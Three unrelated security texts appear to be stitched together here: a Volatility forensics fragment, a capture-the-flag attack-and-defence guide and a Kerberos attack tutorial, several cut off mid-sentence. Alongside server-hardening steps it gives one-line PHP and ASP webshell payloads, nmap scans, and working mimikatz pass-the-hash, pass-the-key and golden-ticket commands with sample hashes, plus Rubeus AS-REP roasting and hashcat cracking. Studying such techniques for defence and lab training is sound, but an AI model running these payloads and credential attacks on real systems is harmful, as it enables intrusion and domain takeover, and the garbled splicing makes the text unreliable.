parameters volatile.exe -f worldskills3.vmem --profile=Win7SP1x64cmdline 16.Scan the list of all files in the memory system volatile.exe -f worldskills3.vmem --profile=Win7SP1x64filescan In Linux system, you can use the filescan command parameter and gerp command to search for keywords. python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 filescan |grep 'flag' python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64filescan | grep -E 'jpg|png|jpeg|bmp|gif' Search for pictures or text python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 filescan |grep -E 'txt' python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 filescan |grep -E 'jpg' Export flag.txt file python2 vol.py -f worldskills3.vmem --profile=Win7SP1x64 dumpfiles -Q0x000000007f1b6c10 -D ./ The process file released by dump is recommended to use foremost to separate the files inside. 17. View file content (filescan needs to be used to cooperate with command query) volatile.exe -f worldskills3.vmem --profile=Win7SP1x64dumpfiles -Q 0

0# What is AWD 0.1# Introduction to AWD Competition System "Occasional and Defensive Mode | AWD (Attack With Defense)" is one of the several main game modes in the CTF competition "CTF Capture The Flag", which is commonly found in offline games. In this mode, each team has the same initial environment (we call it GameBox ) that usually runs certain services or applications that often contain some security vulnerabilities. The participating teams need to exploit security vulnerabilities in the services of the opponent's team to obtain flags to obtain points; at the same time, the participating teams also need to patch their own service vulnerabilities to defend against them in order to prevent them from being attacked and obtained by other teams. The main characteristics are: emphasizing practicality, real-timeness, and confrontation, and comprehensively considering the penetration and protection capabilities of the competition team. 0.2# Overall process of the competition Pre-match preparation session: We will allocate multiple target servers, usually assigned to us SSH or VNC usernames and passwords, as well as related IP and other information Security reinforcement link: We need to log in to the target machine server by ourselves and perform 30 minutes of security reinforcement (source code backup/weak password modification/code auditing and repair/vulnerability repair, etc.) Free attack link: After the security reinforcement time has passed, the free attack link will be started. By attacking target servers of other teams (weak passwords/Web vulnerabilities/system vulnerabilities, etc.) to get extra points, and the corresponding team loses points. 1# Competition environment Usually there are three situations in the competition environment: Hybrid target machine situation: Operation and maintenance machine Windows 10+ attack machine Kali Linux+ Win target machine Windows Server 2003/2008/2012 or Windows 7+ Linux target machine Centos7.x or Ubuntu 16.04/17.01/20.04 Pure Linux target machine situation: Operation and maintenance machine Windows 10+ attack machine Kali Linux+ Linux target machine Centos7.x or Ubuntu 16.04/17.01/20.04 Pure Windows target machine situation: Operation and maintenance machine Windows 10+ attack machine Kali Linux+ Win target machine Windows Server 2003/2008/2012 or Windows 7 2# Security Reinforcement Process (Defense) 2.0# Basic reinforcement process 2.0.1 Windows Reinforcement Process Backup first: Web source code, database 445 reinforcement, enable firewall or IP advanced security policies Turn on the system log audit function Disable guest account and close file sharing Make sure the content of the startup item is controllable Limit the number of connections to remote access control: In the local Group Policy Editor, expand Computer Configuration-Administrative Templates-Windows Components-Remote Desktop Service-Remote Desktop Session Host-Connection-Limit the number of connections Use tools to monitor key directory files : file operation monitoring.exe, Yujian file monitoring.exe. Malicious code files, searched through PCHunter and Monitor Search for related suspicious files in the web directory environment: jpg/png/rar, view attributes, decompress and view file contents NTFS scans disk to find hidden exchange flow data Find all account information in the system and prohibit non-Administrator accounts. Modify the access path, default password, and database password of the Web site administrator Install WAF scripts to protect the Web site and prohibit other vulnerabilities 2.0.2 Linux reinforcement process Backup first: Web source code, database Modify the system password, unified team password Search for historical commands through .bash_history and find traces View scheduled tasks: crontab -l; edit scheduled tasks: crontab -e Check whether there are any exceptions in startup service in /etc/init.d/rc.local Use scripts to enable process monitoring, directory monitoring, and traffic monitoring Web site password, site administrator path modification System Reinforcement: iptable 2.1# Basic information collection When defending, information collection is also very important. As the saying goes, "Know yourself and your enemy, you will never be defeated in a hundred battles." 2.1.1 Clarify Linux machine information uname -a //System information ps -aux //Query process information ps -ef | grep process name //Filter the specified process id //Used to display the user ID and the group ID cat /etc/passwd //View user situation ls /home///Check user situation find/-type d -perm -002 //Writeable directory check ifconfig //View network card information on Linux 2.1.2 Clarify Windows machine information whoami /all //View user details on Windows ipconfig /all //View network card information on Windows 2.1.3 View Open Port netstat //View active connection netstat -ano/-a //Check port status netstat -anp //View port firewall-cmd --zone=public --remove-port=80/tcp –permanent //Close the port firewall-cmd –reload //Restart the firewall 2.1.4 Default password (weak password) change In order to prevent weak password attacks, Mysql password is root by default, phpstudy default password 123456 There are other default passwords admin, top100, top1000, etc. Especially the background password modification of WEB application passwd username //ssh password modification set password for mycms@localhost=password('18ciweufhi28746'); //MySQL password modification find /var/www/html -path '*config*' //Find password credentials in the configuration file 2.1.5 Find local flag grep -r 'flag' /var/www/html///Linux: Find flags in the web directory findstr /s /i 'flag' *.* //Windows: Find the string 'flag' in the current directory and all files in all subdirectories 2.1.6 Setting ping disabled echo '1' /proc/sys/net/ipv4/icmp_echo_ignore_all //Temporarily enable ping ban echo '0' /proc/sys/net/ipv4/icmp_echo_ignore_all //Close ping ban 2.2# Web Security Reinforcement 2.2.1 Backup source code Prevent problems when modifying the source code, or the attacked party deletes the source code and prepares Compressed source code: tar -cvf web.tar /var/www/html zip -q -r web.zip /var/www/html Decompress the source code: tar -xvf web.tar -c /var/www/html unzip web.zip -d /var/www/html Backup source code: mv web.tar /tmp mv web.zip /home/xxx Upload and download source code: scp username@servername:/path/filename /tmp/local_destination //Download a single file from the server to the local scp /path/local_filename username@servername:/path //From a single file from local to the server scp -r username@servername:remote_dir//tmp/local_dir //Download the entire directory from the server to the local scp -r /tmp/local_dir username@servername:remote_dir //Upload the entire directory from local to the server 2.2.2 Set read-only permissions Set read-only and execution permissions for web files (execution permissions are required for dynamic languages such as PHP) chmod 0555 /var/www/html/* chmod 0555 /var/www/html/*.php Set read-only and execution permissions in the web root directory chmod 0555 /var/www/html Change the file's owner and group to set strict permissions chown -R root:root /var/www/html///Set the owner as root:root or httpd:httpd (recommended) chown -R apache:apache /var/www/html///Make sure apache has /var/www/html/ 2.2.3 Configuration .htaccess Use .htaccess configuration file to prohibit the execution of php file Directory '/var/www/html/upload' //The subsequent instructions for the specified directory will be applied to the directory Options -ExecCGI -Indexes //CGI execution and directory indexing (display directory content list) functions in directories are disabled. AllowOverride None //Unable to overwrite the server's configuration in this directory using the .htaccess file. RemoveHandler .php .phtml .php3 .pht .php4 .php5 .php7 .shtml RemoveType .php .phtml .php3 .pht .php4 .php5 .php7 .shtml //These two instructions remove the processor and type of the specified file extension. //In this case, these directives remove PHP-related extensions and server-side inclusion (SSI) file types from Apache's processing list. php_flag engine off //This directive sets the PHP engine flag (engine) to off, thus disabling the ability to execute PHP scripts in this directory. FilesMatch '.+\.ph(p[3457]?|t|tml)$' deny from all /FilesMatch //These three-line commands use regular expressions to match files ending with .php,phtml,php3,pht,php4,php5,php7,shtml, and set their access permissions to deny all /Directory 2.2.4 PHP parameter security configuration First find the PHP configuration file /etc/php/{version}/php.ini Disable high-risk functions disable_functions=dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link Configure open_basedir (limits the activity range of user access files to specified areas) open_basedir=/var/www/html Disable magic quotes (automatically escape external source data to prevent SQL injection) magic_quotes_gpc=Off Close PHP pseudo-protocol allow_url_fopen=Off allow_url_include=Off Restart PHP sudo service php7.0-fpm restart sudo systemctl restart php7.0-fpm.service 2.3# Database security reinforcement 2.3.1 Mysql reinforcement In order to prevent weak password attacks, Mysql password is root by default, phpstudy default password 123456 Don't use the default password, modify it to be complex, and ensure connection with the web environment Set only allow local 127.0.0.1 account login: modify bind-address=127.0.0.1; add secure_file_priv=NULL to the configuration file Turn on the log audit function: general_log_file=path Because the Mysql database is the most commonly used, most of the basic attack and defense are used to use the MySql database commands Backup the specified database: mysqldump –u username –p password databasename target.sql Backup all databases: mysqldump –all -databases all.sql Import the database: mysql –u username –p password database from.sql For MySQL's offense and defense, you can read this article: https://blog.zgsec.cn/archives/26.html MySQL default configuration file path: C:\\Program Files\MySQL\MySQLServer 5.1\my.ini //Windows /etc/my.cnf //Linux /etc/mysql/my.cnf //Linux Modify the secure_file_priv parameter (the corresponding directory of the log function) secure_file_priv='' Overload MySQL configuration FLUSH PRIVILEGES Restart MySQL service sudo service mysql restart sudo systemctl restart mysql 2.3.2 Mssql reinforcement Delete unnecessary accounts SQLServer user password security Avoid account sharing according to users Assign the minimum permissions required for database users Network access restrictions SQLServer login audit SQLServer security incident audit Configure logging function 2.4# Remote control reinforcement 2.4.1 SSH safety reinforcement How to restrict IP login sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions AllowUsers [email protected] //Find and edit the following line to make sure it is uncommented and set to the desired IP address Disable root remote login sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions PermitRootLogin no //Set PermitRootLogi to "no" Restrict SSH login by user and group sudo nano /etc/ssh/sshd_config //Edit SSH configuration file with root permissions AllowUsers testuser //Set only allows testuser to log in to SSH AllowUsers [email protected] //Set only allows 192.168.1.100 machines to log in to SSH with the testuser account AllowGroups test //Set user group whitelist //It should be noted that if AllowUsers and AllowGroups are specified at the same time, then users that match both options must be SSH login Restart SSH service sudo service sshd restart sudo systemctl restart sshd.service 2.4.2 RDP remote login security reinforcement Delete the default account and add new users manually: Step 1: Press Win + R to open the Run dialog box, enter secpol.msc and click OK Step 2: Navigate to this: Local Policy-User Permissions Allocation, and then double-click to open "Allow login through Remote Desktop Service" Step 3: Delete the administrator and remote desktop users (or any other user or group on the computer) listed in this window Step 4: After that click "Add User or Group" and manually add the user you want to grant remote desktop access. Change the default RDP port number: Step 1: Open the Run dialog box, enter regedit and click OK Step 2: Open HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, scroll down and find PortNumber and double-click it Step 3: Select "Decimal", modify the port number you want to set, and then click "OK" 2.5# Emergency Response 2.5.1 Query process thread netstat ps -aux netstat -apt 2.5.2 Kill the process kill -9 pid //on Linux taskkill /f /pid pid //on Windows 2.5.3 Search WebShell Files find /var/www/html -name *.php -mmin -5 //View the file modified in the last 5 minutes find ./-name '*.php' | xargs wc -l | sort -u //Find the file with the shortest number of lines, which is generally a Trojan grep -r --include=*.php '[^a-z]eval($_POST' /var/www/html //Check the php file containing keywords find /var/www/html -type f -name '*.php' | xargs grep 'eval(' |more //In Linux system, use a combination of find, grep and xargs commands to find all files with .php extension in a specified directory (/var/www/html), and search for lines containing the string 'eval(' in these files, and use the more command to paginate the results so that page-by-page viewing is performed when the output is longer 2.5.4 Check to kill horses You can also use commands to automatically search and delete ps -aux | grep www-data | grep -v grep | awk '{print $2}' | xargs kill -9 Then restart the service service php-fpm restart 2.5.5 Kill rebound shell The old rules to view the process ps -ef px -aux ps -aux | grep www-data Note that www-data permissions /bin/sh is likely to be nc Then there is an old order kill ps -aux | grep www-data | grep apache2 | awk '{print $2}' 3# Free Attack (Attack) 3.0# Main content The latest version of various CMS software packages are prepared Scanning tools: Nmap, Nessus, Metasploit updates Exploit Scripts Poc, Exp 3.1# Basic information collection 3.1.1 Host information collection Nmap namp -sn 192.168.0.0/24 //Segment C survival scan httpscan httpscan.py 192.168.0.0/24 –t 10 //C segment survival scan 3.1.2 Port Scan nmap -sV 192.168.0.2 //Scan the host system version nmap -sS 192.168.0.2 //Scan the commonly used ports of the host nmap -sS -p 80,445 192.168.0.2 //Scan the host part of the port nmap -sS -p- 192.168.0.2 //Scan all ports of the host Python scripts import requests for x in range(2,255): url='http://192.168.1.{}'.format(x) try: r=requests.post(url) print(url) except: pass 3.2# External management 3.2.0 Common system vulnerabilities MS17-010 (Eternal Blue, please see https://blog.zgsec.cn/archives/172.html) MySQL performs UDF escalation (SQL injection or MySQL weak password) MsSQL performs system command execution (SQL injection or MsSQL weak password) SSH weak password or default password PWN (This depends on the specific content provided by the AWD competition) 3.2.1 Middleware vulnerability IIS (resolving vulnerabilities, remote code execution) Apache (Parse vulnerability) Nginx (parsing vulnerability) Jboss (CVE-2017-7504/CVE-2017-12149/CVE-2015-7501) Mysql (weak password) Tomcat (weak password Getshell) Weblogic (CVE-2020-2551/CVE-2020-2555/CVE-2020-2883) SpringBoot (Unauthorized access vulnerability and RCE vulnerability, please refer to https://blog.zgsec.cn/archives/129.html) 3.2.2 Vulnerability in integrated service environment wampserver xampserver 3.2.3 CMS Vulnerability Exploit Collect the latest version of CMS, as well as the corresponding vulnerabilities Poc and Exp, here only some of the CMS are listed: Aspcms Dedecms Dicuz Drupal Empirecms Eshop Finecms Joomla Lamp Metainfo Phpcms Phpwind Qibocms Seacms Semcms ThinkPHP Wolfcms Wordpress Zabbix Backup file blasting: Use directory scanning tools such as 7kbScan to blast the web system 3.2.4 Upload WebShell A common saying about Trojan PHP:php @eval($_POST['pass']);php eval($_GET['pass']); Asp: %eval request ('pass')% Aspx: %@ Page Language='Jscript

Kerberos certification process Preface This article mainly shares some of the recently learned attack methods about Kerberos certification in the domain. It mainly focuses on self-understanding, starting from principle understanding to basic tool utilization to explain it. Personal understanding and analysis is relatively long-lasting. If you think it is too long, you can just jump and watch it. Please forgive me. If there is any error, please ask the masters to make corrections The Kerberos authentication process is just a simple description, and there are many details below that are not explained, such as PAC, S4U2SELF (delegation), S4U2PROXY (delegation), etc. Detailed interpretation is recommended to read related articles written by Master daiker The main environment of this article is the VulnStack, the Hongri Shooting Range Domain Control owa win2008R2 192.168.52.138 Domain Host sut1 win7 192.168.52.130 Out-of-domain Host k0uaz win7 (accessible to domain control) 192.168.52.162 mainly involves the subject and role Domain Controller Domain Controller, referred to as DC, a computer, implements unified management of users and computers Key Distribution Center Key Distribution Center, referred to as KDC, is installed in domain control by default, including AS and TGSAuthentication Service Authentication Service Authentication Service, referred to as AS, is used for KDC authentication to Client Ticket Grantng Service Ticket Grantng Service Ticket Grantng Service Ticket Granting Service, referred to as TGS, is used for KDC to distribute Session to Client and Server Key (temporary secret key) Active Directory Active Directory, referred to as AD, is used to store information related to users, user groups, and domains. Client client refers to the user. The server side may be a computer account or a service. Process and Principles The above figure involves three request return processes: AS of Client and KDC, TGS of Client and KDC, Client and Server. The detailed request response is as follows AS-REQ: Client initiates an authentication request to KDC (AS). The requested credentials are the timestamps encrypted by Client's NTLM Hash, and other identity information. AS-REP: AS uses Client NTLM HASH for decryption. If the verification is correct, it returns the TGT ticket encrypted with KRBTGT HASH (this is sent to TGS in TGS-REQ and used to exchange for ST). TGT contains PACTGS-REQ: Client obtains TGT cache locally (cannot decrypt) and can be used to exchange ST tickets to TGS to access the corresponding service TGS-REP: TGS uses KRBTGT HASH to decrypt TGT. If the result is correct, return the ST (server) encrypted by Server Hash (machine user HASH) of the server providing the service. ticket)AP_REQ: Client takes the obtained ST to the server to request the resource AP_REP: Server uses its own Hash to decrypt the ST. If the decryption is correct, use the obtained PAC to access the KDC to determine whether the Client has permission to access. After decrypting the PAC, KDC obtains the user sid and the information of the group, and judges permissions based on the access control table (ACL). If it meets, the Server returns the resource to Client Kerberos-related security issues Pass The Key(Hash) Pass the Hash Pass the Hash is suitable for NTLM authentication and also for Kerberos authentication. It can be used not only outside the domain, but also within the domain. In Kerberos authentication, AS-REQ is sent to AS through Client Hash encryption related information. Therefore, if we obtain the Client's NTLM Hash, we can obtain permissions to other hosts horizontally through Pass The Hash. Use Here we assume that the domain pipe NTLM HASH is obtained that is logged in to a certain domain machine. The following tools for PTH Using Mimikatz, since credentials are required to inject credentials into lsass, local administrator rights (bypassuac) are required to enable Sedebug. After injection, you can use this user credentials to access the host in the domain using wmicexec (both both py or exe) to pth. There is no administrator rights required. It is suitable for direct remote execution of commands using CME to batch verify pth, etc. Here, Mimikatz is used as an example, hack user (a member of the local administrator group of stu1, domain user) No permission to access the domain control shared directory mimikatz after injecting credentials mimikatz 'privilege:debug' 'sekurlsa:pth /user:a /domain:god.org/rc4:b4ab235f987be3621a4ebd862189fd34' Pass the Key mimikatz information tips ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash. Pass the Key can only be used in the domain. The versions that support Aes encryption include win8.1/2012r2 or win7/2008r2/8/2012 with kb2871997 patch installed Use Get aes key Then use sekurlsa:pth module mimikatz 'privilege:debug' 'sekurlsa:pth /user:administrator /domain:god.org /aes256:bf723755bc5f72a377bda41ca58fd925df7ee45df9a026ac5cd320102a3a2e33' Since the Win7 host is not patched, the Pass The Key naturally fails. In a practical environment, when PTH does not support rc4 encryption, it may be in the Protected Users group. At this time, you can try Aes128 and Aes256 encryption to PTK Pass The Hash With Remote Desktop(Restricted Admin mode) In 2014, Microsoft released the KB2871997 patch, which mainly covers the enhanced security protection mechanism in Windows 8.1 and Windows Server 2012 R2. Therefore, in the past, such as Windows 7, Windows 8, Windows Server 2008R2 and Windows Server 2012, you can also update this patch to obtain the above security protection mechanism. ———————————————————————————————————————————————— Restricted Admin RDP mode Remote desktop client support: Prior to this update, RDP login was an interactive login that was accessible only after the user provided the user name and password. When logging into an RDP host in this way, user credentials are placed in the memory of the RDP host, and if the host is threatened, they can be stolen. This update enables RDP to support network logins, where authentication for user existing login tokens can be passed for RDP access. Use this login type to ensure that the user's credentials are not stored on the RDP server. Thus protecting credentials Through the above explanation, we can understand that this mode is to protect user credentials logged in using RDP. Through the login method of network verification, the RDP server will not save user credentials. Use win8.1 and win2012R2 or above support Restricted Admin mode mode, win8.1 and win2012R2 are enabled by default. Condition: Client supports Restricted Admin mode mode, Server enables Restricted Admin mode mode Since win2012R2 is missing on hand, two Windows 10s are used here to pass the Hash With Remote Desktop First get NTLM HASH Use mimikatz to inject NTLM HASH (privilege:debug first to enable debug permission, screenshots are missing here) sekurlsa:pth /user:administrator /domain:192.168.226.137 /ntlm:9c3767903480e04c089090d27123eaf9 '/run:mstsc.exe /restrictedadmin' /domain specifies the computer name or ip Don't choose to always require credentials here Restricted Admin mode Open via the registry (0 is on, 1 is off, full administrator privileges are required), and then RDP connection is done again REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f After the Restricted Admin mode is enabled on the remote host, the RDP connection is successful You can see Hash injected into memory Then here I used the administrator account K0uaz, so the Pass The Hash With Remote Desktop only requires the target's local administrator permissions, not necessarily a local administrator account with sid 500. However, if you just join Remote Desktop Users and are not in the Administratros group, it will not be successful, because this mechanism is for restricted administrators AS-REP Roasting Principle In AS_REP, KDC will return a Session Key encrypted by user NTLM Hash (the Sessions Key is used to ensure the security of communication between the client and TGS) Under RC4_HMAC encryption mode, we can use the same encryption process to encrypt the plaintext password, and then compare the encryption results to determine the blasting result by evaluating whether the ciphertext is the same Although the Session Key ciphertext of the user NTLM Hash encrypted by the user returned in the figure above is encrypted through AES256, we can also use the encryption downgrade method here (the following Kerberoast breaks through the method used to support AES encryption and return RC4_HMAC type encrypted data) to specify that the maximum encryption method supported by the client is only RC4_HMAC, so that the encryption method of the ciphertext returned in AS_REP is RC4_HMAC, so that we can crack the plaintext password. However, one problem that needs to be solved here is the pre-authentication problem. In AS_REQ, a Timestamp with Client Hash encryption will be generated to send it to KDC. KDC obtains a timestamp by decrypting the ciphertext. If the decryption is successful and the timestamp is within 5 minutes, the pre-authentication will be successful. KDC uses this method to verify the client identity, so as to effectively prevent brute-force cracking. As for why AS_REQ is sent twice by default, the explanation obtained from the article of harmj0y is that the client does not know the supported encryption method in advance (I think it is specific to the client not knowing the encryption method of Timestamp in pre-authentication), so I request to obtain the encryption method supported by KDC Therefore, by turning off the pre-authentication, we can perform exhaustive blasting and cracking the plain password After closing pre-authentication, there will be no second AS_REQ, and the only AS_REQ will not contain the NTLM Hash encryption Timestamp ciphertext Use You can query domain users with Do not require Kerberos preauthentication attribute through LDAP The specific query conditions are userAccountControl:1.2.840.113556.1.4.803:=4194304 Here Rubeus is used as a sample Rubeus.exe asreproast /nowrap /format:hashcat hashcat decrypt hashcat -m 18200 hash.txt passwords.dict --force Rubeus asreproast principle analysis Through Wireshark analysis of traffic, we can see that the principle of this module is to query the domain user of the attribute feature through LADP, and then send the AS_REQ request packet in batches, extract the NTLM Hash encryption part in the return packet for formatting and output suitable for Hashcat blasting. ldap query Specifies that the supported encryption type is RC4_HMAC only The returned ciphertext is encrypted using RC4_HMAC (so it can be exhaustively blasted) Gold Notes Features It is necessary to communicate with DC (no need to interact with AS, but need to TGS) It requires the hash of krbtgt user Principle During the kerberos authentication process of Windows, the Client sends its own information to the KDC, and then the KDC uses the NTLM-Hash of the Krbtgt user as the key to encrypt and generates TGT. So if you get the NTLM-Hash value of Krbtgt, can you forge any TGT? Because Krbtgt is only available on domain controllers, using gold credentials means that you have obtained permissions on domain controllers before, and gold credentials can be understood as a backdoor. condition 1. Domain name 2. SID value of the domain 3. The domain's KRBTGT account password HASH 4. Forged username can be arbitrary (TGT's service life is within 20 minutes, and the domain controller KDC service will not verify the user account in TGT) When we get the Hash of krbtgt, we can use it to make gold notes Suppose we have obtained the hash of krbtgt through dcsync's attack method (explained and practice below) Condition 1: Scan the spn to get the domain name god.org Condition 2: whoami /all gets the domain user sid, and removes the last string of the domain SID Condition 3: krbtgt account Hash58e91a5ac358d86513ab224312314061 Condition 4: Forge username administrator Make gold notes Use mimikatz kerberos:golden forged tgt Golden Ticket Default Group: Domain user SID: S-1-5-21 DOMAINID -513 Domain Admin SID: S-1-5-21 DOMAINID -512 Architecture Administrator SID: S-1-5-21 DOMAINID -518 Enterprise Admin SID: S-1-5-21 DOMAINID -519 (It is valid only when a forged ticket is created in the forest root domain, but add the use /sids parameter for AD forest administrator permissions) Group Policy Creator Owner SID: S-1-5-21 DOMAINID -520 mimikatz.exe 'kerberos:golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /user:administrator /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:k0u.kiribi' exit tip: can add /endin:xx /renewmax:xx to modify the validity period of the bill and the maximum validity period for renewal bills. Mimikatz defaults to 10 years The generated tickets can be imported on other domain machines, or tgt can be injected directly into memory using /ptt. First clear the ticket cache klist purge Then inject it into the cached bill via mimikatzkerberos:ptt k0u.kiribi klist checks the ticket cache and can see the forged tgt